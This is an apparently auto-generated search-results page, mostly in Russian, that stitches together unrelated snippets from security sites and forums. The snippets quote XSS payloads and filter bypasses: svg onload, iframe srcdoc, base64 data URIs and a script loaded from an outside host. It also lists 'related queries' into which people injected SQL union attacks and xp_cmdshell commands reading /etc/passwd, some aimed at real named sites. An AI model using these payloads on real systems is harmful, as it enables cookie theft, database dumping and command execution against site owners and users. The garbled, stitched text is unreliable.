Поиск Google ничего не нашел

Методы обхода защитных средств веб-приложений при... / Хабр

habr.com

...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.

Xss Injection | XSS in SVG (short)

salmonsec.com

Bypass email filter. (RFC compliant). "><svg/onload=confirm(1)>"@x.y. Bypass document blacklist.

XSS уязвимость taburetka.ua - Форум... — Zelenka.guru (Lolzteam)

zelenka.guru

Вчера нашел XSS уязвимость на сайте [Войдите или зарегистрируйтесь для просмотра ссылок]><svg onload=alert

Top 500 Наиболее важных XSS скриптов для тестирования на...

itsecforu.ru

...div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript

GitHub - FierceTaipan/vuln

github.com

Пробелы между аттрибутами в тэге могут заменить слэшем <iframe/onload='alert()' - необязательно закрывать тэг.

Cross-site scripting (XSS)

rootsector.blogspot.com

<script src=14.rs> you can alsoo specify an arbitratry payload with 14.rs/#payload e.g: 14.rs/#alert(document.domain).

XSS (Cross Site Scripting) - HackTricks

book.hacktricks.xyz

<iframe srcdoc="<svg onload=alert(4);>"> Other obfuscation tricks. In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.

Полезная нагрузка, связанная с XSS, и памятка обхода - Русские...

russianblogs.com

XSS с использованием данных. data:text/html,<script>alert(0)</script>data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ

Методы обхода защитных средств веб-приложений при...

itnan.ru

...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.

</script><svg onload=alert(document.cookie)> — Яндекс Кью

yandex.ru

спрашивает</script><svg onload=alert(document.cookie)> · 1 ответ.

Похожие запросы:

nobd.iac.kz. авторизация') and 1=1 union all select 1,null,'<script>alert("xss")</script>',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')#
wso 2.6 ext:php') and 1=1 union all select 1,null,'<script>alert("xss")</script>',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')#
walbrofuelpumps.com/forum/profile.php?id=167960' and 1=1 union all select 1,null,'<script>alert("xss")</script>',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')
wso 2.6 ext:php') and 1=1 union all select 1,null,'<script>alert("xss")</script>',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')
"><script >alert(string.fromcharcode(88,83,83))</script>
"><javascript:alert(string.fromcharcode(88,83,83));">
9 сынып тест сұрақтары биология') and 1=1 union all select 1,null,'<script>alert(\"xss\")</script>',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')
9 сынып тест сұрақтары биология') and 1=1 union all select 1,null,'<script>alert(\"xss\")</script>',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')#
nobd.iac.kz. авторизация') and 1=1 union all select 1,null,'<script>alert("xss")</script>',table_name from information_schema.tables where 2>1--/**/; exec xp_cmdshell('cat ../../../etc/passwd')
"><svg/onload=confirm(/openbugbounty/)>

kil3r1dz"><svg onload=alert(1998)> на YouTube:

Поиск реализован с помощью YandexXML и Google Custom Search API